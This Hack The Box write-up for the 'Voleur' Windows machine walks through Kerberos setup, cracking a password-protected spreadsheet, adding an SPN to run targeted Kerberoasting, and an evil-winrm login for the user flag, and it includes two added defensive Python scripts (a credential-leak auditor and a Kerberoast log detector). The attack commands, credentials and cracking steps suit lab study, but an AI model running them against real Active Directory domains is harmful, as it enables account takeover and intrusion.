Voleur - Hack The Box
Platform: Windows
IP: 10.129.29.242
Difficulty: Medium
Author: NoSec
🚨 Follow along live on HTB: leaks, drops and deep-dive writeups
👉 t.me/nosecpwn
Don't just read. Join.
Recon
nmap -sV -sC -Pn 10.129.29.242
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 10:16 CEST
Nmap scan report for 10.129.29.242
Host is up (0.063s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-06 16:16:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
The box provides a starting credential pair:
ryan.naylor / HollowOct31Nyt
Edit the hosts file:
sudo nano /etc/hosts
10.129.29.242 voleur.htb dc.voleur.htb
Time sync matters (Kerberos rejects requests with clock skew), so set the clock from the DC:
sudo rdate -n dc.voleur.htb
Kerberos
krb5.conf setup:
[libdefaults]
default_realm = VOLEUR.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
[realms]
VOLEUR.HTB = {
kdc = 10.129.29.242
admin_server = 10.129.29.242
}
[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB
Get a Kerberos ticket (TGT), written to the cache file used below:
KRB5CCNAME=ryan.ccache kinit ryan.naylor@VOLEUR.HTB
Kerberos SMB connection with Impacket:
export KRB5CCNAME=ryan.ccache
smbclient.py -k -no-pass -dc-ip 10.129.29.242 VOLEUR.HTB/ryan.naylor@dc.voleur.htb
We enter the IT share and download the Access_Review.xlsx file:
get Access_Review.xlsx
Cracking the file (office2john + john):
office2john Access_Review.xlsx > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Cracked password:
fo<passw>
Decrypting the contents:
pip install msoffcrypto-tool
msoffcrypto-tool Access_Review.xlsx decrypted.xlsx -p fo<pass>
xlsx2csv decrypted.xlsx access.csv
cat access.csv
File contents:
User,Job Title,Permissions,Notes
Ryan.Naylor,First-Line Support Technician,SMB,Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant,First-Line Support Technician,SMB,
Lacey.Miller,Second-Line Support Technician,Remote Management Users,
Todd.Wolfe,Second-Line Support Technician,Remote Management Users,Leaver. Password was reset and account deleted.
Jeremy.Combs,Third-Line Support Technician,Remote Management Users.,Has access to Software folder.
Administrator,Administrator,Domain Admin,Not to be used for daily tasks!
Service Accounts,,,
svc_backup, ,Windows Backup,Speak to Jeremy!
svc_ldap,,LDAP Services,P/W - [REDACTED]
svc_iis,,IIS Administration,P/W - [REDACTED]
svc_winrm,,Remote Management ,Need to ask Lacey as she reset this recently.
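The spreadsheet above is exactly the kind of export that leaks service-account passwords and documents weakened accounts. As an added example (not part of the original writeup), the following Python script audits an access-review CSV of this layout from the defender's side: it flags rows whose Notes column carries a plaintext credential, a Kerberos pre-auth exemption or a leaver account, and can redact the credential values before the file is shared. The sample CSV is constructed with placeholder passwords; the rule names and regexes are assumptions, and only the column headers come from the page.

```python
import csv
import io
import re

# Constructed sample in the same column layout as the Access_Review.xlsx export
# on this page. Passwords are placeholders, not real values.
SAMPLE_CSV = """User,Job Title,Permissions,Notes
Ryan.Naylor,First-Line Support Technician,SMB,Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant,First-Line Support Technician,SMB,
Todd.Wolfe,Second-Line Support Technician,Remote Management Users,Leaver. Password was reset and account deleted.
Administrator,Administrator,Domain Admin,Not to be used for daily tasks!
Service Accounts,,,
svc_backup, ,Windows Backup,Speak to Jeremy!
svc_ldap,,LDAP Services,P/W - PLACEHOLDER_PW_1
svc_iis,,IIS Administration,P/W - PLACEHOLDER_PW_2
svc_winrm,,Remote Management ,Need to ask Lacey as she reset this recently.
"""

# Assumed audit rules: (finding name, severity, regex applied to the Notes column).
# The password rule requires a separator after the keyword, so a sentence like
# "Password was reset" does not fire, while "P/W - value" does.
RULES = [
    ("plaintext_password", "high",
     re.compile(r"\b(?:p/?w|password|pass)\s*[-:=]\s*\S", re.I)),
    ("preauth_disabled", "high",
     re.compile(r"pre-?auth\w*\s+disabled", re.I)),
    ("leaver_account", "medium",
     re.compile(r"\bleaver\b", re.I)),
]

# Same keyword logic, but capturing the separator so the value can be replaced.
CRED_VALUE_RE = re.compile(r"(\b(?:p/?w|password|pass)\s*[-:=]\s*)\S+", re.I)


def audit_access_review(csv_text):
    """Return a list of (user, finding, severity) for every rule a row's Notes match."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        user = (row.get("User") or "").strip()
        notes = (row.get("Notes") or "").strip()
        if not user or not notes:
            continue  # section rows such as "Service Accounts,,," and empty notes
        for name, severity, pattern in RULES:
            if pattern.search(notes):
                findings.append((user, name, severity))
    return findings


def redact_credentials(csv_text):
    """Replace any credential value following a P/W / password marker with [REDACTED]."""
    return CRED_VALUE_RE.sub(r"\1[REDACTED]", csv_text)


if __name__ == "__main__":
    for user, finding, severity in audit_access_review(SAMPLE_CSV):
        print(f"{severity:6} {finding:20} {user}")
    print(redact_credentials(SAMPLE_CSV))
```

Run it against the real export (read the file instead of SAMPLE_CSV) before a spreadsheet like this lands on a shared drive; the high findings are the rows an attacker with read access would go for first.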
Add an SPN to the svc_winrm account (targeted Kerberoasting; this only succeeds because svc_ldap can write the target's servicePrincipalName attribute):
cat > addspn.ldif << 'EOF'
dn: CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb
changetype: modify
add: servicePrincipalName
servicePrincipalName: HTTP/voleur.htb
EOF
ldapmodify -x -H ldap://10.129.29.242 -D "svc_ldap@voleur.htb" -w "M1X<pass>" -f addspn.ldif
Then we request the service ticket and crack its hash:
python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -k -request -request-user svc_winrm -dc-ip 10.129.29.242 -dc-host dc.voleur.htb voleur.htb/svc_ldap > tgs_hashes.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs tgs_hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFire<pass> (?)
1g 0:00:00:05 DONE (2025-07-06 21:12) 0.1886g/s 2164Kp/s 2164Kc/s 2164KC/s AHANACK6978012..ADDRESS1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Cracked password:
AFire<pass>
Request and export a TGT:
impacket-getTGT 'VOLEUR.HTB/SVC_WINRM:AFire<pass>'
export KRB5CCNAME=SVC_WINRM.ccache
Log in with evil-winrm and grab the user flag:
evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
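The detection angle for the SPN-add plus Kerberoast sequence above, as an added example rather than anything from the original writeup: a Python correlator over Windows Security events. A targeted Kerberoast shows up as event 5136 (directory service object modified) adding a servicePrincipalName value to an account, followed shortly by event 4769 (Kerberos service ticket requested) for that same account with TicketEncryptionType 0x17 (RC4-HMAC), which is the etype 23 hash john reports in the output above. Recording 5136 needs the Audit Directory Service Changes subcategory plus a SACL on the objects; 4769 needs Audit Kerberos Service Ticket Operations. The events below are constructed samples in the shape of those event fields, with placeholder source addresses; the rule names and the 30-minute window are assumptions.

```python
from datetime import datetime, timedelta

RC4_HMAC = "0x17"        # TicketEncryptionType value for RC4-HMAC in event 4769
VALUE_ADDED = "%%14674"  # OperationType value meaning "Value Added" in event 5136

# Constructed sample events (not real logs from the box), keyed with the field
# names Windows uses in the 5136 and 4769 event XML. IPs are placeholders.
SAMPLE_EVENTS = [
    {"time": "2025-07-06T21:05:10", "id": 5136, "SubjectUserName": "svc_ldap",
     "ObjectDN": "CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "HTTP/voleur.htb", "OperationType": VALUE_ADDED},
    {"time": "2025-07-06T21:05:40", "id": 4769, "TargetUserName": "svc_ldap@VOLEUR.HTB",
     "ServiceName": "svc_winrm", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.0.0.99"},
    # Benign: AES ticket for the DC's own account, never flagged.
    {"time": "2025-07-06T21:06:00", "id": 4769, "TargetUserName": "marie.bryant@VOLEUR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:10.0.0.50"},
    # RC4 request with no preceding SPN change: worth a look, but lower priority.
    {"time": "2025-07-06T21:07:00", "id": 4769, "TargetUserName": "jeremy.combs@VOLEUR.HTB",
     "ServiceName": "svc_backup", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:10.0.0.51"},
]


def cn_from_dn(dn):
    """'CN=svc_winrm,OU=...' -> 'svc_winrm' (value of the first RDN)."""
    rdn = dn.split(",", 1)[0]
    return rdn.split("=", 1)[1].strip() if "=" in rdn else rdn.strip()


def account_from_service_name(service_name):
    """4769 ServiceName is normally the sAMAccountName; strip realm or SPN decoration."""
    return service_name.split("@", 1)[0].split("/", 1)[0].lower()


def detect_targeted_kerberoast(events, window=timedelta(minutes=30)):
    """Pair SPN additions (5136) with later RC4 TGS requests (4769) for the same account.

    Every RC4 TGS request becomes a medium alert; one that follows an SPN add on
    the same account inside the window is raised to high and annotated with who
    added the SPN and how long they waited.
    """
    spn_adds = {}  # account (lowercase sAMAccountName) -> (time, added by, SPN value)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if (ev["id"] == 5136
                and ev.get("AttributeLDAPDisplayName") == "servicePrincipalName"
                and ev.get("OperationType") == VALUE_ADDED):
            account = cn_from_dn(ev["ObjectDN"]).lower()
            spn_adds[account] = (t, ev["SubjectUserName"], ev["AttributeValue"])
        elif ev["id"] == 4769 and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC:
            account = account_from_service_name(ev["ServiceName"])
            alert = {"severity": "medium", "rule": "rc4_tgs_request", "account": account,
                     "requested_by": ev["TargetUserName"], "source": ev["IpAddress"]}
            added = spn_adds.get(account)
            if added and timedelta(0) <= t - added[0] <= window:
                alert.update(severity="high", rule="targeted_kerberoast",
                             spn_added_by=added[1], spn=added[2],
                             delay_seconds=int((t - added[0]).total_seconds()))
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect_targeted_kerberoast(SAMPLE_EVENTS):
        print(a)
```

The same correlation works with a SIEM query: join 5136 where AttributeLDAPDisplayName is servicePrincipalName against 4769 where TicketEncryptionType is 0x17 on the account name. Beyond detection, the mitigations are the usual ones: review who holds write access to service accounts' SPN attribute, move service accounts to AES-only (msDS-SupportedEncryptionTypes) so RC4 tickets are not issued, and use long random passwords or gMSAs so a captured ticket does not crack.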
*Evil-WinRM* PS C:\Users\svc_winrm> cd Desktop
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> ls
Directory: C:\Users\svc_winrm\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/29/2025 7:07 AM 2312 Microsoft Edge.lnk
-ar--- 7/6/2025 10:33 AM 34 user.txt
✅ User flag obtained!
🔐 The root part is only available in the private Telegram group while the box is active in Season 8.
👉 Join for the full writeup, extra tips and insider content:
📡 https://t.me/nosecpwn